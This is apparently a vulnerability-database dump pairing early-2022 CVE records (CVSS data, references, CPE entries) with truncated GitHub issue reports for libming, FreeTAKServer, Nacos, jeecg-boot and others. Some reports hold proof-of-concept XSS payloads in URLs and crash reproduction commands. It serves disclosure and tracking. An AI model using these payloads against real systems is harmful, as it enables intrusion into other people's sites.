Ming 0.4.8 has an out-of-bounds buffer access issue in the function decompileINCR_DECR() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969612" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/libming/libming/issues/203
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile1640.zip](https://github.com/libming/libming/files/5123144/seg-decompile1640.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==79767==ERROR: ...
Segmentation fault in function decompileINCR_DECR, decompile.c 1640
https://api.github.com/repos/libming/libming/issues/203/comments
0
2020-08-25T10:33:55Z
2020-08-25T10:33:55Z
https://github.com/libming/libming/issues/203
685,372,287
203
3,316
CVE-2021-34341
2022-03-10T17:42:37.920
Ming 0.4.8 has an out-of-bounds read vulnerability in the function decompileIF() in the decompile.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969628" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "125" ]
125
https://github.com/libming/libming/issues/204
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler2516.zip](https://github.com/libming/libming/files/5123238/overflow-decompiler2516.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==16585...
Buffer overflow in decompileIF, decompile.c:2516
https://api.github.com/repos/libming/libming/issues/204/comments
0
2020-08-25T10:45:49Z
2020-08-25T10:45:49Z
https://github.com/libming/libming/issues/204
685,379,611
204
3,317
CVE-2021-34342
2022-03-10T17:42:38.207
Ming 0.4.8 has an out-of-bounds read vulnerability in the function newVar_N() in decompile.c which causes a huge information leak.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969619" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "125" ]
125
https://github.com/libming/libming/issues/205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52 which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler751.zip](https://github.com/libming/libming/files/5123287/overflow-decompiler751.zip) Here is the r...
Buffer overflow in newVar_N, decompile.c:751
https://api.github.com/repos/libming/libming/issues/205/comments
0
2020-08-25T10:55:36Z
2020-08-25T10:55:36Z
https://github.com/libming/libming/issues/205
685,385,426
205
3,318
CVE-2021-3660
2022-03-10T17:42:55.647
Cockpit (and its plugins) do not seem to protect itself against clickjacking. It is possible to render a page from a cockpit server via another website, inside an <iFrame> HTML entry. This may be used by a malicious website in clickjacking or similar attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1980688" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cockpit-project:cockpit:*:*:*:*:*:*:*:*", "matchCriteriaId": "24AF3BAD-6273-447B-ACC7-9705C2C198DC", "versionEndExcluding": "254", "versionEndIncluding": null, "versionStartE...
[ "1021" ]
1021
https://github.com/cockpit-project/cockpit/issues/16122
[ "Patch", "Third Party Advisory" ]
github.com
[ "cockpit-project", "cockpit" ]
Through a security scan, I was notified: > _The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a us...
Is cockpit vulnerable to clickjacking? [CVE-2021-3660]
https://api.github.com/repos/cockpit-project/cockpit/issues/16122/comments
12
2021-07-20T13:49:33Z
2021-09-20T13:50:57Z
https://github.com/cockpit-project/cockpit/issues/16122
948,674,224
16,122
3,319
CVE-2021-44269
2022-03-10T17:44:14.923
An out of bounds read was found in Wavpack 5.4.0 in processing *.WAV files. This issue triggered in function WavpackPackSamples of file src/pack_utils.c, tainted variable cnt is too large, that makes pointer sptr read beyond heap bound.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/issues/110" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wavpack:wavpack:5.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "3FA5388B-91D0-45C6-BEC9-4953666966D7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "125" ]
125
https://github.com/dbry/WavPack/issues/110
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "dbry", "WavPack" ]
Hi, I have found a heap out of bounds read bug in function WavpackPackSamples, base on the commit a0ba858455b7c94f26c8f75511592323a70c3feb, code that caused crash shows below: source:src/pack_utils.c+632 ``` 628 if (wps->wphdr.flags & MONO_FLAG) { 629 switch (wpc->config.byt...
A heap Out-of-bounds Read in WavpackPackSamples (src/pack_utils.c)
https://api.github.com/repos/dbry/WavPack/issues/110/comments
3
2021-11-23T17:17:36Z
2022-03-12T17:58:28Z
https://github.com/dbry/WavPack/issues/110
1,061,532,820
110
3,320
CVE-2022-0856
2022-03-10T17:44:57.487
libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/65" }, { "source": "patrick@puiterwijk.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta20:*:*:*:*:*:*", "matchCriteriaId": "303D619F-28E8-474A-A435-FD95E0BC480F", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "369" ]
369
https://github.com/cacalabs/libcaca/issues/65
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cacalabs", "libcaca" ]
version: latest commit f42aa68fc798db63b7b2a789ae8cf5b90b57b752 driver: `src/img2txt` Environment: ubuntu 22.04, clang-12 step to reproduce: ``` export CFLAGS="-fsanitize=address -g" export CC=clang ./bootstrap ./configure make -j8 ./src/img2txt ./divide_by_0.seed ``` Sanitizer output: ``` AddressSaniti...
[BUG] Divide by zero in img2txt
https://api.github.com/repos/cacalabs/libcaca/issues/65/comments
3
2022-02-24T09:19:26Z
2022-08-03T09:44:11Z
https://github.com/cacalabs/libcaca/issues/65
1,149,044,044
65
3,321
CVE-2022-24177
2022-03-10T17:45:59.393
A cross-site scripting (XSS) vulnerability in the component cgi-bin/ej.cgi of Ex libris ALEPH 500 v18.1 and v20 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zhao1231/cve_payload/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gith...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exlibrisgroup:aleph_500:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "E9E7FFE8-8723-4F9B-ABD4-0E7F2119DB49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "79" ]
79
https://github.com/zhao1231/cve_payload/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "zhao1231", "cve_payload" ]
**1** we can search Wuhan University Library on Google and click ![企业微信截图_16443782227933](https://user-images.githubusercontent.com/87362545/153117967-6afcec97-c7e4-4616-9779-759e33f08259.png) **2** then we click the E-journals of Resources ![image](https://user-images.githubusercontent.com/87362545/153118421-a...
Ex libris_xss vulnerability
https://api.github.com/repos/zhao1231/cve_payload/issues/1/comments
0
2022-02-09T03:38:05Z
2022-02-09T05:54:33Z
https://github.com/zhao1231/cve_payload/issues/1
1,128,011,460
1
3,322
CVE-2022-24193
2022-03-10T17:45:59.733
CasaOS before v0.2.7 was discovered to contain a command injection vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/IceWhaleTech/CasaOS/commit/d060968b7ab08e7f8cbfe7ca9ccdfa47afe9bb06" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*", "matchCriteriaId": "DBF947F7-0A3B-4B3B-BA2A-F60AC8FC8F5C", "versionEndExcluding": "0.2.7", "versionEndIncluding": null, "versionStartExcludi...
[ "78" ]
78
https://github.com/IceWhaleTech/CasaOS/issues/84
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "IceWhaleTech", "CasaOS" ]
**Describe the bug** Here is a security vulnerability will lead to controller the system. **Detail** https://www.star123.top/2022/01/08/A-vulnerability-in-CasaOS/#more and the password is sent to Guan.Ningchuan@gmail.com.
A security vulnerability which will lead to controller the system
https://api.github.com/repos/IceWhaleTech/CasaOS/issues/84/comments
4
2022-01-26T07:30:28Z
2022-01-28T09:12:31Z
https://github.com/IceWhaleTech/CasaOS/issues/84
1,114,710,756
84
3,323
CVE-2021-44585
2022-03-10T21:15:14.397
A Cross Site Scripting (XSS) vulnerabilitiy exits in jeecg-boot 3.0 in /jeecg-boot/jmreport/view with a mouseover event.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "79" ]
79
https://github.com/jeecgboot/jeecg-boot/issues/3223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.0 ##### 问题描述: http://boot.jeecg.com:8080/jeecg-boot/jmreport/view/')%22onmouseover=alert('hacking')%20%20( ##### 截图&代码: ![image](https://user-images.githubusercontent.com/63626545/144021468-eedd94b9-694a-435d-8588-a747f3410ab2.png)
反射型XSS漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3223/comments
4
2021-11-30T09:33:40Z
2022-03-14T01:15:49Z
https://github.com/jeecgboot/JeecgBoot/issues/3223
1,067,002,316
3,223
3,324
CVE-2022-24726
2022-03-10T21:15:14.603
Istio is an open platform to connect, manage, and secure microservices. In affected versions the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted message which results in the control plane crashing when the validating webhook for a cl...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/51112" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "E255ACB0-90AB-4FC4-AC4B-D7DE613A115E", "versionEndExcluding": "1.11.8", "versionEndIncluding": null, "versionStartExcluding"...
[ "400" ]
400
https://github.com/golang/go/issues/51112
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "golang", "go" ]
On 64-bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, strings.Repeat("(", 1<<20)+strings.Repeat(")", 1<<20) is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of...
regexp: stack overflow (process exit) handling deeply nested regexp
https://api.github.com/repos/golang/go/issues/51112/comments
9
2022-02-09T20:13:46Z
2023-06-22T21:55:10Z
https://github.com/golang/go/issues/51112
1,128,977,907
51,112
3,325
CVE-2022-25506
2022-03-11T00:15:08.253
FreeTAKServer-UI v1.9.8 was discovered to contain a SQL injection vulnerability via the API endpoint /AuthenticateUser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/FreeTAKTeam/UI/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
The API endpoint `/AuthenticateUser` contains a SQL Injection into the SQLite3 Database that is handling the authentication process of the SystemUsers. In order to exploit this vulnerability the attacker need to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a p...
SQL Injection on AuthenticateUser
https://api.github.com/repos/FreeTAKTeam/UI/issues/27/comments
0
2022-02-16T09:38:15Z
2024-05-15T23:13:25Z
https://github.com/FreeTAKTeam/UI/issues/27
1,139,772,026
27
3,326
CVE-2022-25507
2022-03-11T00:15:08.307
FreeTAKServer-UI v1.9.8 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Callsign parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/FreeTAKTeam/UI/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
In the FreeTAKServer-UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter. ##### Web Interface In the case of a XSS in the WebUI i...
XSS through Emergency Alert
https://api.github.com/repos/FreeTAKTeam/UI/issues/28/comments
0
2022-02-16T09:44:15Z
2022-09-14T17:45:24Z
https://github.com/FreeTAKTeam/UI/issues/28
1,139,778,219
28
3,327
CVE-2022-25508
2022-03-11T00:15:08.353
An access control issue in the component /ManageRoute/postRoute of FreeTAKServer v1.9.8 allows unauthenticated attackers to cause a Denial of Service (DoS) via an unusually large amount of created routes, or create unsafe or false routes for legitimate users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "306" ]
306
https://github.com/FreeTAKTeam/FreeTakServer/issues/291
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "FreeTakServer" ]
In the RestAPI there is also the Endpoint _/ManageRoute/postRoute_ which is unauthenticated. While this might not seem interesting at first, it is possible to broadcast new routes (suggested tracks to take) to every End User Device (EUD) connected to the server. This can create two issues, either create a Denial of Ser...
Unauthenticated Public RestAPI Endpoint
https://api.github.com/repos/FreeTAKTeam/FreeTakServer/issues/291/comments
1
2022-02-16T09:39:27Z
2022-03-12T17:49:17Z
https://github.com/FreeTAKTeam/FreeTakServer/issues/291
1,139,773,235
291
3,328
CVE-2022-25510
2022-03-11T00:15:08.397
FreeTAKServer 1.9.8 contains a hardcoded Flask secret key which allows attackers to create crafted cookies to bypass authentication or escalate privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "798" ]
798
https://github.com/FreeTAKTeam/FreeTakServer/issues/292
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "FreeTakServer" ]
In the sourcecode there are 3 relevant places that the Flask Secrets Key are hardcoded. Flask signs all their client sessions with this secret key, usually defined in an _Environment Variable_. In this case though there's these three places that these are hardcoded into. ![Github_Flask_Secret-key](https://user-imag...
Hardcoded Flask Secrets Key - "Privilege Escalation"
https://api.github.com/repos/FreeTAKTeam/FreeTakServer/issues/292/comments
1
2022-02-16T09:47:16Z
2022-03-12T17:48:51Z
https://github.com/FreeTAKTeam/FreeTakServer/issues/292
1,139,781,389
292
3,329
CVE-2022-25512
2022-03-11T00:15:08.503
FreeTAKServer-UI v1.9.8 was discovered to leak sensitive API and Websocket keys.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "200" ]
200
https://github.com/FreeTAKTeam/UI/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
The WebUI leaks the RestAPI and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS. ##### API Bearer Token ![SourceCode_RestAPI-key](https://user-images.githubusercontent.com/14073684/154236551-6bba6a80-8132-...
API and Websocket Keys Leakage
https://api.github.com/repos/FreeTAKTeam/UI/issues/26/comments
4
2022-02-16T09:36:43Z
2024-05-05T21:28:29Z
https://github.com/FreeTAKTeam/UI/issues/26
1,139,770,507
26
3,330
CVE-2018-25031
2022-03-11T07:15:07.190
Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. Note: This was originally claimed to be resolved in 4.1.3. However, third parties have indicated this ...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/swagger-api/swagger-ui/issues/4872" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "ht...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*", "matchCriteriaId": "29C4300C-B377-4221-923F-A804BA5A9348", "versionEndExcluding": "4.1.3", "versionEndIncluding": null, "versionStartEx...
[ "20" ]
20
https://github.com/swagger-api/swagger-ui/issues/4872
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "swagger-api", "swagger-ui" ]
### Content & configuration Swagger-UI configuration options: ```js SwaggerUI({ enableQueryConfig: false // new }) ``` ### Is your feature request related to a problem? <!-- Please provide a clear and concise description of what the problem is. "I'm always frustrated when..." --> We’v...
add an `enableQueryConfig` option
https://api.github.com/repos/swagger-api/swagger-ui/issues/4872/comments
5
2018-09-13T03:02:46Z
2022-01-28T15:11:15Z
https://github.com/swagger-api/swagger-ui/issues/4872
359,724,685
4,872
3,331
CVE-2020-36518
2022-03-11T07:15:07.800
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "E4445932-0923-4D28-8911-CFC9B61DFE2B", "versionEndExcluding": "2.12.6.1", "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/FasterXML/jackson-databind/issues/2816
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
**EDIT**: related to to CVE-2020-36518 (see https://nvd.nist.gov/vuln/detail/CVE-2020-36518) **EDIT**: Fix included in * 2.14.0 * 2.13.3: * Was also included in 2.13.2.1 and 2.13.2.2 (see https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13); to be used with `jackson-bom` version `2.13.2.20220328...
Optimize `UntypedObjectDeserializer` wrt recursion [CVE-2020-36518]
https://api.github.com/repos/FasterXML/jackson-databind/issues/2816/comments
77
2020-08-13T01:12:31Z
2022-11-18T17:40:21Z
https://github.com/FasterXML/jackson-databind/issues/2816
678,075,273
2,816
3,332
CVE-2021-44667
2022-03-11T19:15:09.023
A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7359" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Par...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alibaba:nacos:2.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "17F01261-A90A-47BA-AD51-79329B2CAB90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/alibaba/nacos/issues/7359
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alibaba", "nacos" ]
Nacos has xss vulnerability Trigger condition: no verification required version: Nacos 2.0.3 payload1:`/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script>` payload2:`/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1` ![image](https://user-images.githubusercontent.com/95545320/14...
This is XSS vulnerabilities
https://api.github.com/repos/alibaba/nacos/issues/7359/comments
2
2021-12-04T19:23:34Z
2022-06-06T14:22:31Z
https://github.com/alibaba/nacos/issues/7359
1,071,277,772
7,359
3,333
CVE-2022-26276
2022-03-12T01:15:35.240
An issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
